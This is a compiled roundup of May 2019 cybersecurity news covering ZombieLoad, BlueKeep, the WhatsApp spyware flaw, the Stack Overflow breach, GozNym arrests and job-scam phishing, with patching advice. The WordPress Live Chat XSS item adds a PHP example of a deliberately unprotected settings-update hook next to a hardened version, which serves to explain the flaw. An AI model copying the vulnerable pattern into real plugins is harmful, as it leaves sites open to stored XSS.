Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about vulnerabilities that can allow hackers to retrieve data from CPUs and mine cryptocurrency.

Read on:

May’s Patch Tuesday Includes Fixes for ‘Wormable’ Flaw in Windows XP, Zero-Day Vulnerability

Microsoft’s May security release includes updates for 80 vulnerabilities for a number of Microsoft products, including a security update for unsupported operating systems such as Windows XP and Server 2003.

Trend Micro Unveils Cloud-Native Security Customized to the Demand of DevOps

Trend Micro launched container security capabilities added to Trend Micro Deep Security to elevate protection across the entire DevOps lifecycle and runtime stack.

Side-Channel Attacks RIDL, Fallout, and ZombieLoad Affect Millions of Vulnerable Intel Processors

Researchers found a bevy of critical vulnerabilities in modern Intel processors that, when exploited successfully, can leak or let hackers retrieve data being processed by the vulnerable CPUs.

Trump Issues Executive Order Paving Way for Ban on Huawei

President Trump has issued an executive order declaring a national emergency and prohibiting U.S. companies from using telecom services that are solely owned, controlled, or directed by a foreign adversary, clearing the way for a ban on the Chinese-owned Huawei.

Unsecured Server Leaks PII of Almost 90% of Panama Residents

The personally identifiable information of almost 90% of Panama’s population has been divulged due to an unsecured Elasticsearch server that was found without authentication or firewall protection, connected to the internet, and publicly viewable on any browser.

Google Discloses Security Bug in its Bluetooth Titan Security Keys, Offers Free Replacement

Google says that the security bug, which could allow an attacker in close physical proximity to circumvent the security the key is supposed to provide, is due to a “misconfiguration in the Titan Security Keys’ Bluetooth pairing protocols.”

Jenkins Vulnerability Exploited to Drop Kerberods Malware and Launch Monero Miner

Threat actors were found exploiting CVE-2018-1000861, a vulnerability in the Stapler web framework that is used by the Apache Jenkins open-source software development automation server with versions 2.153 and earlier.

Crypto Exchange Binance Restarting Services After Post-Hack Upgrade

Cryptocurrency exchange Binance has announced that it is back online after completing a security upgrade prompted by a recent hack that saw 7,000 BTC worth $41 million stolen.

Do you worry about your personally identifiable information being divulged to cyber criminals? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

Download Hijack Flaw Patched in Slack Patches for Windows

Slack users have been urged to upgrade their applications and clients to the most recent version, 3.4.0, after Tenable researcher David Wells discovered a new vulnerability that would allow an attacker to share malicious hyperlinks that could alter where a victim’s files were stored.

Wells discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. “This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium),” today’s press release said.

If users click on the link, an attacker could not only steal future documents downloaded within Slack but also manipulate them, such as injecting malicious code that would compromise the victim’s machine once opened, according to Wells.

The attack reportedly can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.

“Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview,” which Wells discusses in depth in his blog post.

The flaw was found in the Slack desktop application for Windows version 3.3.7, which Tenable reported to Slack via HackerOne. “Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version,” a Slack spokesperson said.

“The digital economy and global distributed workforce have brought new technologies to market with the ultimate goal of seamless connectivity,” said Renaud Deraison, co-founder and chief technology officer, Tenable. “But it’s critical that organizations realize this emerging technology is potentially vulnerable and part of their expanding attack surface. Tenable Research continues to work with vendors such as Slack to disclose our discoveries to ensure consumers and organizations are secure.”

Episode 495 – Tools, Tips and Tricks – Mozilla Observatory

This week’s tools, tips and tricks is about Mozilla Observatory. This is a web scanner meant to help developers and security professionals find and fix weaknesses and make their web apps more secure. Mozilla Observatory. Be aware, be safe. *** Support the podcast with a cup of coffee *** – Ko-Fi Security In Five Don’t forget to subscribe […]

The post Episode 495 – Tools, Tips and Tricks – Mozilla Observatory appeared first on Security In Five.

More Orgs Use Booby Traps for Counterintelligence

A recent survey found that, in order to gather counterintelligence, the vast majority of organizations would allow an attacker to take decoy files rather than stop an attack in progress, according to the latest International Cyber Benchmark Index from the Neustar International Security Council (NISC).

A reported one in five companies are currently employing forensic investigations, as well as setting up honey pots and repositories of fake data to lure attackers in, but an impressive 71% of respondents said that, rather than shutting down an attack when a bad actor accesses a deceptive file, they would be willing to let the malicious actor take the booby-trapped document, according to a May 16 press release.

Being able to collect intelligence could allow defenders to identify thieves in the future, potentially revealing information about the location, ownership and possible vulnerabilities of the hackers’ machines, the press release said.

Of the respondents surveyed, 51% said their enterprise had suffered a distributed denial-of-service (DDoS) attack, and 52% of participants also identified phishing as a growing threat with targeted hacking. DDoS attacks followed close behind at 49%.

“Security leaders increasingly feel that breaches are inevitable, and there is a growing appetite for advanced forensic tools that can deliver insights around attacker attribution and tactics in real time,” said Rodney Joffe, chairman of NISC and Neustar SVP and fellow.

“Whether they opt to use them like an alarm system, ejecting bad actors from the network upon contact with a honey pot or deceptive file, or for a more sophisticated counterintelligence operation that gathers vital information on attacker movements and methods, cybersecurity professionals want solutions that can provide better real-time awareness and understanding of the enemy.”

According to the survey, the threat of social engineering continues to rise across all vectors, with 48% of respondents admitting they witnessed an uptick in attempts via email, 38% noting a rise in text-based attempts and 36% reporting a rise in attempts via phone.

Responses showed that security pros are more aware not only of where attacks are originating but also of the types of attacks that pose the greatest threats.

Baltimore Won’t Pay Ransom, Systems Remain Down

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to a copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers warning that if the city called the FBI they would cut off contact, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

WhatsApp Will Never be Safe, Says Telegram Founder

In a direct attack on WhatsApp, Telegram founder Pavel Durov has stated that the Facebook-owned WhatsApp would never be safe.

In a statement that he wrote on Telegraph, Pavel Durov points out that hackers could access anything (photos, emails, texts, etc.) on any phone that had WhatsApp installed. He also discusses the security issue WhatsApp recently faced: a high-severity bug that could allow hackers to inject spyware remotely into a phone simply by making a WhatsApp call.

Durov writes, “Every time WhatsApp has to fix a critical vulnerability in their app, a new one seems to appear in its place. All of their security issues are conveniently suitable for surveillance, and look and work a lot like backdoors.”

He points out that unlike Telegram, WhatsApp is not an open source platform and hence it never allows security researchers to easily check if there are backdoors in its code. Instead of publishing its code, WhatsApp deliberately obfuscates their apps’ binaries so that no one is able to study them thoroughly, he adds.

Durov explains that back in 2012, when he was working to develop Telegram, WhatsApp was still transferring messages in plain-text in transit and not just governments or hackers, but mobile providers and even Wi-Fi admins had access to all WhatsApp texts.

WhatsApp later added some encryption, but the key to decrypt messages was available with several governments, who could thus decrypt conversations on WhatsApp very easily. Durov says, “Then, as Telegram started to gain popularity, WhatsApp founders sold their company to Facebook and declared that “Privacy was in their DNA”. If true, it must have been a dormant or a recessive gene.”

Discussing how the end-to-end encryption introduced in 2016 by WhatsApp works, Pavel Durov says, “3 years ago WhatsApp announced they implemented end-to-end encryption so “no third party can access messages“. It coincided with an aggressive push for all of its users to back up their chats in the cloud. When making this push, WhatsApp didn’t tell its users that when backed up, messages are no longer protected by end-to-end encryption and can be accessed by hackers and law enforcement. Brilliant marketing, and some naive people are serving their time in jail as a result.”

Durov also explains that those who don’t back up their chats can still be traced in many ways. He says that the metadata generated by WhatsApp users is leaked to different agencies in large volumes by WhatsApp’s parent company. Added to all this, there are critical vulnerabilities coming one after the other.

He writes, “WhatsApp has a consistent history – from zero encryption at its inception to a succession of security issues strangely suitable for surveillance purposes. Looking back, there hasn’t been a single day in WhatsApp’s 10 year journey when this service was secure. That’s why I don’t think that just updating WhatsApp’s mobile app will make it secure for anyone.”

In his statement, Durov explains why people can’t stop using WhatsApp all of a sudden. He says that a lot of people can’t do this because their friends and families still continue to use WhatsApp. He writes, “It means we at Telegram did a bad job of persuading people to switch over. While we did attract hundreds of millions of users in the last five years, this wasn’t enough. The majority of internet users are still held hostage by the Facebook/WhatsApp/Instagram empire. Many of those who use Telegram are also on WhatsApp, meaning their phones are still vulnerable.”

Durov says this about Telegram: “In almost 6 years of its existence, Telegram hasn’t had any major data leak or security flaw of the kind WhatsApp demonstrates every few months. In the same 6 years, we disclosed exactly zero bytes of data to third-parties, while Facebook/WhatsApp has been sharing pretty much everything with everybody who claimed they worked for a government.”

He explains that unlike Facebook, which has a huge marketing department, Telegram does zero marketing and wouldn’t want to pay journalists and researchers to write about it. It instead relies on its users.

Well, that’s the gist of what the Telegram founder has to say. Let’s wait for the other side of the story, and see whether WhatsApp comes up with its own statement defending itself in response to everything Pavel Durov has written.

Why Are Cryptographers Being Denied Entry into the US?

In March, Adi Shamir -- that's the "S" in RSA -- was denied a US visa to attend the RSA Conference. He's Israeli.

This month, British citizen Ross Anderson couldn't attend an awards ceremony in DC because of visa issues. (You can listen to his recorded acceptance speech.) I've heard of at least one other prominent cryptographer who is in the same boat. Is there some cryptographer blacklist? Is something else going on? A lot of us would like to know.

Stack Overflow Discloses Digital Attack against Production Systems

Stack Overflow, a popular question and answer site for programmers, disclosed a digital attack in which bad actors accessed its production systems. Mary Ferguson, VP of Engineering at the company, publicly revealed the incident on 16 May. In a statement posted to Stack Overflow’s website, she explained that someone had obtained production-level access to the […]

The post Stack Overflow Discloses Digital Attack against Production Systems appeared first on The State of Security.

Hacktivist Attacks Have Fallen 95% Since 2015

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant because the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekels, and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgaria, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Stack Overflow Q&A platform announced a data breach

The popular question-and-answer platform for programmers Stack Overflow announced on Thursday that it has suffered a data breach.

Another data breach is making the headlines; this time the victim is the popular question-and-answer platform for programmers Stack Overflow.

The company announced on Thursday that it had discovered unauthorized access to its production systems over the weekend.

The company immediately launched an investigation. At this time the company has not shared technical details about the intrusion; it has only revealed that it has found no evidence that customer or user data was compromised.

“Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11,” reads a data breach notification published by Mary Ferguson, VP of Engineering at Stack Overflow. “We discovered and investigated the extent of the access and are addressing all known vulnerabilities.”

Stack Overflow has more than 10 million registered users and it has over 50 million unique visitors every month. The Q&A platform is the most important website of the Stack Exchange Network.

Back in December 2018, another popular Q&A platform, Quora, revealed that it had suffered a data breach.

Unknown hackers breached its systems and accessed the data of 100 million users; the exposed data included names, email addresses and hashed passwords.

Pierluigi Paganini

(SecurityAffairs – data breach, hacking)

The post Stack Overflow Q&A platform announced a data breach appeared first on Security Affairs.

XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites

A vulnerability in the Live Chat Support plugin for WordPress could be exploited by attackers to inject malicious scripts in websites using it

Researchers at Sucuri have discovered a stored/persistent cross-site scripting (XSS) vulnerability in the WP Live Chat Support plugin for WordPress.

The flaw could be exploited by remote, unauthenticated attackers to inject malicious scripts into websites running the WordPress CMS with the Live Chat Support plugin installed. The issue could be exploited by a remote attacker that does not have an account on the affected website.

It has been estimated that the plugin currently has over 60,000 installs; it implements a chat solution for customer engagement and conversion.

Versions of the plugin prior to 8.0.27 are vulnerable to stored/persistent XSS.

Experts pointed out that an attack triggering this issue could be automated to hit a broad range of victims.

An XSS vulnerability could allow hackers to inject malicious code into websites and compromise visitors’ accounts or expose them to modified page content. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.

An XSS is persistent (stored) when the malicious code is added to a section that is stored on the server. Every time a visitor’s browser loads the page, it parses and executes the malicious code.

The vulnerability can be triggered through an unprotected admin_init hook, which serves as the attack vector.

Experts discovered that the function wplc_head_basic lacks proper privilege checks when updating the plugin settings.

“It then executes an action hook with even more critical settings,” reads the advisory published by Sucuri. “Since ‘admin_init’ hooks can be called visiting either /wp-admin/admin-post.php or /wp-admin/admin-ajax.php, an unauthenticated attacker could use these endpoints to arbitrarily update the option ‘wplc_custom_js’.”

The content of the option is added to every page that loads the live chat support, allowing attackers to inject malicious JavaScript code on multiple pages.
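The unauthenticated settings-update pattern the advisory describes, beside a hardened form of it, as an added illustration that is not the plugin’s own code: everything prefixed example_ is hypothetical, and only admin_init and the existence of a stored custom-JS option come from the advisory.

```php
<?php
// Added illustration, not the WP Live Chat Support plugin's code. Names prefixed
// "example_" are hypothetical; the pattern mirrors what the advisory describes:
// a settings update bound to admin_init with no privilege check.

// ---- Vulnerable pattern ----------------------------------------------------
// admin_init fires for every request to /wp-admin/admin-post.php and
// /wp-admin/admin-ajax.php, including requests from visitors who are not logged
// in, so this callback runs for anyone who can reach those endpoints.
function example_vulnerable_save_settings() {
    if ( isset( $_POST['example_custom_js'] ) ) {
        // No capability check, no nonce: any request can rewrite the option.
        update_option( 'example_custom_js', wp_unslash( $_POST['example_custom_js'] ) );
    }
}
add_action( 'admin_init', 'example_vulnerable_save_settings' );

// The option is printed into every page that loads the chat widget. Custom JS
// is executed by design, so whoever can write the option controls every
// visitor's browser: that is the stored XSS.
function example_print_custom_js() {
    $js = get_option( 'example_custom_js', '' );
    if ( '' !== $js ) {
        echo "<script>\n" . $js . "\n</script>\n";
    }
}
add_action( 'wp_head', 'example_print_custom_js' );

// ---- Hardened pattern -----------------------------------------------------
// Same feature, but the write path is gated on who is asking and why.
function example_hardened_save_settings() {
    if ( ! isset( $_POST['example_custom_js'] ) ) {
        return;
    }
    // 1. Only users who may manage site options can change plugin settings;
    //    anonymous requests to admin-post.php / admin-ajax.php stop here.
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    // 2. A nonce bound to this action blocks cross-site request forgery
    //    through a logged-in administrator's browser (wp_die() on mismatch).
    check_admin_referer( 'example_save_settings', 'example_settings_nonce' );

    update_option( 'example_custom_js', wp_unslash( $_POST['example_custom_js'] ) );
}
// Registering on admin_post_{action} instead of admin_init means the callback
// is only reached by logged-in users posting action=example_save_settings;
// anonymous requests would need admin_post_nopriv_{action}, which is not registered.
add_action( 'admin_post_example_save_settings', 'example_hardened_save_settings' );

// ---- Detection aid ---------------------------------------------------------
// Log every change to the option with the acting user, so a write from user id 0
// (no logged-in session) stands out in the PHP error log.
function example_audit_custom_js( $old_value, $new_value ) {
    error_log( sprintf(
        '[example] custom_js changed by user %d from %s: %s -> %s',
        get_current_user_id(),
        isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown',
        md5( (string) $old_value ),
        md5( (string) $new_value )
    ) );
}
add_action( 'update_option_example_custom_js', 'example_audit_custom_js', 10, 2 );
```

For the hardened path the settings form must post to admin-post.php with a hidden action field of example_save_settings and emit wp_nonce_field( 'example_save_settings', 'example_settings_nonce' ).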

To secure your WordPress install, update the WP Live Chat Support plugin to version 8.0.27.

Below is the timeline of the flaw:

  • April 30, 2019: Initial contact attempt.
  • May 15, 2019: Patch is live.

Pierluigi Paganini

(SecurityAffairs – Live Chat Support, Hacking)

The post XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites appeared first on Security Affairs.

Pharmaceutical companies exploited by phishing scam targeting job seekers

Earlier this month, two major pharmaceutical giants issued warnings about phishing emails targeting job hunters.

GlaxoSmithKline and AstraZeneca say they are victims of recruitment scams, in which crooks create fake job adverts to obtain people’s personal and financial details. The bogus ads can be hard to spot, because they use legitimate logos and material, and hide the scammers’ email addresses effectively.

How the scam works

Based on AstraZeneca and GlaxoSmithKline’s statements, this is a fairly standard case of recruitment fraud. Job seekers find the fake advert on a recruitment site and provide their CV, which will typically include the applicant’s name, email address, current employer and other personal details.

The scammers will then email the applicant to say they are being considered, before offering them a job. At this point, one of two things will happen.

The scammers might refer the victim to an employment agent (also fake), who will ask for money to complete registration fees. Alternatively, the victim might report directly to the HR department of the bogus employer.

Either way, the final step of the crooks’ plan is to ask for financial details to pay the employee’s salary into. They will instead use the details to steal money, before cutting all ties with the victim.

Why it’s so successful

Recruitment fraud seems like one of the more obvious scams to spot. How could anyone’s alarm not be raised if they are offered a job without an interview?

Unfortunately, red flags like that are ignored in all kinds of phishing scams, and this scheme is a perfect example of why that happens. Most of us know how disheartening it is to send off application after application knowing that you probably won’t ever hear anything back. It’s therefore completely understandable that curiosity and/or hope might get the better of you when you hear that you’re not only in consideration but have also been offered a job.

Sure, you’re likely to be a little suspicious, but it’s a highly respected organisation like GlaxoSmithKline or AstraZeneca, so it must be legitimate, right?

It’s only in retrospect that you see all the clues that should’ve confirmed your suspicions.

What should you be looking for?

GlaxoSmithKline says job hunters can determine the legitimacy of an advert by asking:

  • Are there major spelling or grammatical errors in the communication?
  • What is the sender’s email address? Does this seem consistent with previous communications?
  • Who is sending the email? Search the name online to determine whether it’s a real employee and whether they are the appropriate person to be managing the application process.

It adds that an advert posted by a third party isn’t necessarily fraudulent, but recommends that job hunters research the company to see if they represent the organisation.

It’s not the end of the world if you don’t spot a scam during the application process. The crooks will have your contact details and any other information on your CV, but at least they won’t have your financial details. Preventing that from happening is simple, provided you remain cautious.

AstraZeneca and GlaxoSmithKline remind job hunters that they never ask for money during the recruitment process (no legitimate organisation would). The latter adds that:

If you receive a genuine job offer of a job with us, whether the offer is made directly by us or through an agency, you will not be required to pay any money towards administration fees.

We also recommend that you do not disclose personal or financial details to anyone you do not know.

As is standard, GlaxoSmithKline says that interviewees or those who have been offered jobs might be asked to provide passport information or other personal identification, such as a National Insurance number.

If you receive and accept a job offer, you will obviously have to provide financial information; this will typically be at the same time as you sign your employee contract. However, you should only be asked for account information, which is used to deposit funds, rather than the card number, which is used to withdraw funds.

Can you spot a phishing scam?

The warnings issued by AstraZeneca and GlaxoSmithKline show just how big of a threat phishing poses. The methods for spotting and preventing it are the same no matter what form the scam takes, yet millions of people fall victim in both personal and work environments.

When it comes to recruitment scams, it’s up to individuals to protect their own data, but organisations have a lot more at stake. An employee who can’t spot a malicious email is liable to hand over vast amounts of sensitive information or expose the organisation to further threats. For example, most ransomware attacks are spread via phishing emails.

Organisations can tackle that threat with our Phishing and Ransomware – Human patch e-learning course.

This ten-minute course explains the basics of email-based threats, showing staff how to spot and avoid phishing scams and ransomware.

The post Pharmaceutical companies exploited by phishing scam targeting job seekers appeared first on IT Governance Blog.

WhatsApp, Microsoft and Intel Chip Vulnerabilities

Quickly applying software updates (patching) to mitigate security vulnerabilities is a cornerstone of both a home and business security strategy. So it was interesting to see how the mainstream news media reported the disclosure of three separate ‘major’ security vulnerabilities this week, within WhatsApp, Microsoft Windows and Intel Processors.


The WhatsApp security flaw received by far the most media attention and was very much the leading front-page news story for a day. The WhatsApp vulnerability (CVE-2019-3568) impacts both iPhone and Android versions of the mobile messaging app, allowing an attacker to install surveillance software, namely spyware called Pegasus, which can access the smartphone's call logs and text messages, and can covertly enable and record the camera and microphone.

From a technical perspective, the vulnerability (CVE-2019-3568) can be exploited with a buffer overflow attack against WhatsApp's VOIP stack; this makes remote code execution possible by sending specially crafted SRTCP packets to the phone. It is a sophisticated exploit.

Should you be concerned?

WhatsApp said it believed only a "select number of users were targeted through this vulnerability by an advanced cyber actor." According to the FT, that threat actor was an Israeli company called ‘NSO Group’. NSO developed the exploit to sell on; NSO advertises that it sells products to government agencies "for fighting terrorism and aiding law enforcement investigations". NSO products (aka "spyware") are known to be used by government agencies in the UAE, Saudi Arabia and Mexico.

So, if you are one of the 1.5 billion WhatsApp users and not a Middle East political activist or a Mexican criminal, you probably shouldn’t worry too much about your smartphone having been exploited in the past. If you had been exploited, there would be signs, such as unusual glitches and activity on your phone. Despite the low risk at present, all WhatsApp users should quickly update the WhatsApp app before criminals attempt to ‘copycat’ the NSO Group exploitation.

How to Prevent 

Update the WhatsApp app.

On iPhone:

  • Open the Apple App Store app
  • Search for WhatsApp Messenger
  • Tap 'Update' and the latest version of WhatsApp will be installed
  • App version 2.19.51 and above fixes the vulnerability

On Android:

  • Open Google Play Store
  • Tap the menu in the top left corner
  • Go to “My Apps & Games”
  • Tap ‘Update’ next to WhatsApp Messenger and the latest version of WhatsApp will be installed
  • App version 2.19.134 and above fixes the vulnerability

Microsoft Worm Vulnerability CVE-2019-0708

Making fewer media headlines was the announcement of a new “wormable” vulnerability discovered within various versions of Microsoft’s Windows operating system. The vulnerability, CVE-2019-0708, is within Windows' “remote desktop services” component.

This vulnerability is by far the most dangerous vulnerability reported this week, and probably this year; it is a similar flaw to the one the WannaCry malware exploited en masse in May 2017. WannaCry was a ransomware worm which severely impacted the operation of several large organisations, including the NHS. It exploited a similar Microsoft Windows vulnerability which enabled the malware to quickly self-propagate (worm) across networks and infect vulnerable systems en masse with ransomware, rendering such systems unusable.

Such is the concern about a second WannaCry-style attack due to this flaw that Microsoft has taken the rare step of releasing security patches for unsupported versions of the Windows operating system, such as Windows XP and Windows Server 2003.

How to Prevent

Apply the latest Microsoft Windows Update. Microsoft has said anti-virus products will not provide any protection against the exploitation of this vulnerability; therefore applying the Microsoft May 2019 Security Update, released on Tuesday 14th May 2019, is the only way to be certain of protecting against the exploitation of this critical vulnerability.

Ensure automatic updates are always kept switched on. Windows by default should attempt to download and install the latest security updates; typically you will be prompted to apply the update and accept a reboot. Do this without delay.

To double check, select the Start menu, followed by the gear cog icon on the left. Then, select Update & Security and Windows Update.

Businesses must also seek to apply Microsoft security updates as soon as they are released. Large organisations typically control the release of Microsoft security patches centrally; they should monitor and risk-assess the importance of newly released security updates, and then apply them across their IT estate at a rate based on risk.

Intel CPU ZombieLoad Vulnerability

There was little mainstream coverage of a third major security vulnerability reported this week. Dubbed 'ZombieLoad', this side-channel processor vulnerability is present in almost every Intel processor made since 2011. This hardware vulnerability is a concern to businesses which use or provide cloud services. This flaw can also be mitigated by patching, with Microsoft, Apple, Amazon and Google all releasing security patches. For further information about the Intel CPU vulnerability, read the following posts.

CVE-2019-0708 – A Critical “Wormable” Remote Code Execution Vulnerability in Windows RDP

This is an important security advisory related to a recently patched Critical remote code execution vulnerability in Microsoft Windows Remote Desktop Services (RDP). The vulnerability is identified as “CVE-2019-0708 – Remote Desktop Services Remote Code Execution Vulnerability”. The MSRC blog notes that this vulnerability is pre-authentication and requires no user interaction. In other…

New infosec products of the week: May 17, 2019

Alcide launches continuous security and hygiene scanner for Kubernetes and Istio Alcide Advisor is a continuous security and hygiene scanner for Kubernetes & Istio, which automatically scans for the widest range of compliance, security and governance risks and vulnerabilities. Already deployed in numerous customer environments, and fully integrated with the CI/CD pipeline, it empowers engineering teams to maintain engineering motion and identify security drifts and risks, even before they are introduced to production. Keysight Technologies … More

The post New infosec products of the week: May 17, 2019 appeared first on Help Net Security.

How can we give cybersecurity analysts a helping hand?

It’s tough being a cybersecurity analyst these days. Over the last few years we have been repeatedly reminded of the challenge they are now facing, primarily through the steady stream of high-profile data breaches that have hit the headlines. In the last month alone Microsoft has been in the news after suffering a breach that enabled hackers to access customer email accounts, while a breach at beleaguered social giant Facebook was believed to have left … More

The post How can we give cybersecurity analysts a helping hand? appeared first on Help Net Security.

Stack Overflow’s Production Systems Accessed by Hackers

In a brief announcement yesterday, Stack Overflow reports that it was the target of an attack that led hackers to access its production systems.

The website is currently online, and the few public details provided in a short message indicate that an investigation revealed that a “level of production access was obtained on May 11”.

User data are safe

It is not clear how the intruders were able to access the internal Stack Overflow network, but the actions taken as a result of the breach include patching all known vulnerabilities. The incident was discovered internally, and the initial assessment is that no customer or user data has been affected.

“Our customers’ and users’ security is of the utmost importance to us. After we conclude our investigation cycle, we will provide more information,” says Mary Ferguson, VP of Engineering at Stack Overflow.

Stack Overflow was launched in 2008 as a website for questions and answers about programming topics. As part of the Stack Exchange Network, it is a community of more than 10 million members as of January 2019.

Stack Overflow is available in several languages (English, Spanish, Russian, Portuguese and Japanese). According to the website, more than 50 million visitors access it every month, looking for ways to solve their problems, develop their skills or find work.

The platform is considered a reliable source for accurate trends in the developer community, as well as for pay package information based on experience, location, training and technology.




The post Stack Overflow’s Production Systems Accessed by Hackers appeared first on .

Memory analysis is the ground truth

In recent years, enterprises have adopted next-gen endpoint protection products that are doing an admirable job detecting anomalies. For example, searching for patterns such as remote access to memory, modification of specific registry keys and alerting on other suspicious activities. However, typically anomalies only provide us with an indication that something is wrong. In order to understand the root problem, respond and ensure that a machine is entirely clean, we must search for the malicious … More

The post Memory analysis is the ground truth appeared first on Help Net Security.

The largest breaches over the past three years have caused massive and irreparable damage

